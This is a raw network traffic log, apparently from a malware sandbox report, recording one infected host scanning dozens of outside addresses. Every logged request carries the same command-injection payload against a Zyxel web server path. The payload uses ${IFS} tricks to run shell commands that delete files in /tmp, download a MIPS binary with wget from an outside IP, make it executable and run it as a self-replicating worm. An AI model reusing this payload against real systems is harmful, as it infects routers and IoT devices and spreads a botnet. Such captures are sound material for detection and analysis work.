                                        Jan 14, 2024 16:18:57.761459112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8101192.168.2.1348820116.59.77.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.761486053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8102192.168.2.1334442185.159.196.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.761513948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8103192.168.2.1354174118.240.202.90443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.761565924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8104192.168.2.1340734147.91.146.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.761599064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8105192.168.2.1333222177.77.182.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.761641026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8106192.168.2.1334912166.25.188.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.761677980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8107192.168.2.133460020.132.115.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.761738062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8108192.168.2.1351654119.56.175.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.761761904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8109192.168.2.1352466119.62.124.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.761801958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8110192.168.2.1337182140.76.57.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.761846066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8111192.168.2.135731263.94.244.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.761893988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8112192.168.2.134845281.222.130.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.764849901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8113192.168.2.135484837.231.117.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.765882015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8114192.168.2.135725096.28.16.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.765928030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8115192.168.2.1349172124.89.244.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.765975952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8116192.168.2.133926089.253.101.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766031981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8117192.168.2.1344984114.248.6.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766071081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8118192.168.2.1357848180.243.146.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766113043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8119192.168.2.135301220.70.8.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766143084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8120192.168.2.1351856166.25.122.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766166925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8121192.168.2.13537429.187.36.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766220093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8122192.168.2.1336280101.24.113.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766239882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8123192.168.2.1333430183.164.76.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766288042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8124192.168.2.1340296217.250.217.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766309023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8125192.168.2.133536480.168.191.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766359091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8126192.168.2.1336738103.197.136.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766385078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8127192.168.2.1354748220.197.64.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766411066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8128192.168.2.135596864.249.239.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766446114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8129192.168.2.133883864.190.173.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766467094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8130192.168.2.1360896205.29.67.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766546011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8131192.168.2.133911427.7.168.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766577005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8132192.168.2.1335330156.79.64.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766616106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8133192.168.2.1337418192.20.168.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766666889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8134192.168.2.1333598174.205.30.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766704082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8135192.168.2.1352048117.200.86.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766742945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8136192.168.2.135467036.114.195.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766772985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8137192.168.2.135504424.19.49.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766804934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8138192.168.2.1359884178.137.123.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766834021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8139192.168.2.1356396201.76.112.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766920090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8140192.168.2.1339130206.222.75.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766949892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8141192.168.2.1338062169.195.111.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.766982079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8142192.168.2.1355432109.58.53.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.767033100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8143192.168.2.1354994160.72.217.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.767071009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8144192.168.2.1358826126.76.250.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.767077923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8145192.168.2.1341744178.255.114.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.767115116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8146192.168.2.134951083.134.57.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.767152071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8147192.168.2.1356504138.4.68.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.767180920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8148192.168.2.1345516152.161.135.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.767220974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8149192.168.2.1333760197.65.48.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.767260075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8150192.168.2.1344794105.215.109.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.767302036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8151192.168.2.1335014161.202.189.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.767334938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8152192.168.2.134473293.99.165.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.767378092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8153192.168.2.1346040132.76.32.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.767388105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8154192.168.2.133903861.45.233.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.767448902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8155192.168.2.135767891.158.140.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.767482996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8156192.168.2.1333822199.37.97.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.767541885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8157192.168.2.1355602101.135.88.90443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.768127918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8158192.168.2.1358904120.70.97.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.777081013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8159192.168.2.1347220185.235.67.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.777149916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8160192.168.2.135902097.192.198.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.780416965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8161192.168.2.1338760147.64.166.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.780478001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8162192.168.2.1358510202.74.33.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.780606985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8163192.168.2.1346236151.243.68.188443
                                        TimestampBytes transferredDirectionData
